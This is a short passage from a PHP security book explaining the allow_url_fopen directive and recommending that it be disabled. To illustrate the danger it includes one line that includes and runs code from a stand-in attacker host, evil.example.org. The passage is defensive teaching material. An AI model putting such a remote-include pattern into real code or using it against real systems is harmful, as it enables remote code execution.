Section A.1. allow_url_fopen


A.1. allow_url_fopen

As illustrated in Chapter 6, the allow_url_fopen directive allows you to reference remote resources as if they are local files:

     <?php     $contents = file_get_contents('http://example.org/xss.html');     ?> 

Chapter 5 reveals how dangerous this is when combined with the use of include or require:

     <?php     include 'http://evil.example.org/evil.inc';     ?> 

I recommend disabling allow_url_fopen unless your application requires it.




Essential PHP Security
Essential PHP Security
ISBN: 059600656X
EAN: 2147483647
Year: 2005
Pages: 110

Similar book on Amazon

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net